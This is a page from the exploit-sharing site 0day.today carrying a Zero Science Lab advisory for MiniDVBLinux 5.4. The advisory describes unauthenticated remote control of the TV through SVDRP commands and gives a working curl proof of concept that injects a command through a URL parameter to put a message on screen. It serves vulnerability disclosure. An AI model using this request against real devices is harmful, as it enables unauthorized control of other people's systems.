0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MiniDVBLinux 5.4 SVDRP Control Vulnerability
MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP (svdrpsend.sh) Exploit Vendor: MiniDVBLinux Product web page: https://www.minidvblinux.de Affected version: <=5.4 Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple way to convert a standard PC into a Multi Media Centre based on the Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this Linux based Digital Video Recorder: Watch TV, Timer controlled recordings, Time Shift, DVD and MP3 Replay, Setup and configuration via browser, and a lot more. MLD strives to be as small as possible, modular, simple. It supports numerous hardware platforms, like classic desktops in 32/64bit and also various low power ARM systems. Desc: The application allows the usage of the SVDRP protocol/commands to be sent by a remote attacker to manipulate and/or control remotely the TV. Tested on: MiniDVBLinux 5.4 BusyBox v1.25.1 Architecture: armhf, armhf-rpi2 GNU/Linux 4.19.127.203 (armv7l) VideoDiskRecorder 2.4.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5714 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5714.php 24.09.2022 -- Send a message to the TV screen: curl http://ip:8008/?site=commands§ion=system&command=svdrpsend.sh%20MESG%20WE%20ARE%20WATCHING%20YOU! 220 mld SVDRP VideoDiskRecorder 2.4.6; Wed Sep 28 13:07:51 2022; UTF-8 250 Message queued 221 mld closing connection For more commands: - https://www.linuxtv.org/vdrwiki/index.php/SVDRP#The_commands # 0day.today [2024-07-01] #